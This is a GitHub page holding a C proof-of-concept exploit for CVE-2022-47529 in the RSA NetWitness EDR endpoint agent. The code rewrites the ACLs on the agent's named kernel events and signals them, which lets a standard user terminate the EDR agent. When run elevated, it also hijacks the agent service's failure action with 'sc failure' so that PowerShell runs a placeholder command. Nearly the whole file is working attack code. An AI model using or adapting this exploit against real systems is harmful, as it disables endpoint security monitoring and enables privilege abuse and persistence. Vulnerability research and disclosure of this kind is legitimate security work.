-
Notifications
You must be signed in to change notification settings - Fork 4
/
RSA_NetWitness_Exploit.c
167 lines (132 loc) · 5.87 KB
/
RSA_NetWitness_Exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"
#define OPEN_ALL_ACCESS 0x1F0003
/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49
Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.
By John Page (hyp3rlinx) - Nov 2022
DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.
X64 PE file vuln code block:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run Exploit PoC as a Standard non-admin user, the PoC will:
a) Open a handle (copy) to Ecat002 event.
b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group.
c) Set/Reset event the Ecat002 handle.
d) if admin privs change the EDR service configuration
Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln.
*/
char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED=FALSE;
void Exploit();
int AdminChl();
void HijackSvcConfig();
int main(void){
printf("[+] RSA NetWitness EDR Agent 0Day\n");
printf("[+] CVE-2022-47529\n");
printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
printf("[+] ===================================\n");
Exploit();
if( AdminChk() ){
printf("[+] Hijacked NetWitness Agent Service!\n");
HijackSvcConfig();
}
Sleep(2000);
printf("[+] Done!\n\n");
system("pause");
return 0;
}
void Exploit(){
PACL pOldDACL = NULL;
PACL pNewDACL = NULL;
HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");
int i=0;
for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);
if(hEvent != INVALID_HANDLE_VALUE){
printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
Sleep(500);
if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){
TRUSTEE trustee[1];
trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
trustee[0].ptstrName = TEXT("Everyone");
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
trustee[0].pMultipleTrustee = NULL;
EXPLICIT_ACCESS explicit_access_list[1];
ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
explicit_access_list[0].grfAccessMode = DENY_ACCESS;
explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
explicit_access_list[0].grfInheritance = NO_INHERITANCE;
explicit_access_list[0].Trustee = trustee[0];
if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}
if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}else{
SetEvent(hEvent_Ecat002);
Sleep(1000);
ResetEvent(hEvent_Ecat002);
CloseHandle(hEvent_Ecat002);
SetEvent(hEvent);
Sleep(1000);
PWNED=TRUE;
}
if(PWNED){
LocalFree(pNewDACL);
LocalFree(pOldDACL);
CloseHandle(hEvent);
}
Sleep(1000);
}
}
}
}
//If run as admin, modify the agent service config to run our own code.
int AdminChk(){
int result = 0;
HANDLE hToken = NULL;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){
TOKEN_ELEVATION elevated;
DWORD tokSize = sizeof(TOKEN_ELEVATION);
if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
result = elevated.TokenIsElevated;
}
}
if(hToken){
CloseHandle(hToken);
}
return result;
}
//Trivial example modify the service config...
void HijackSvcConfig(){
Sleep(1000);
WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0);
}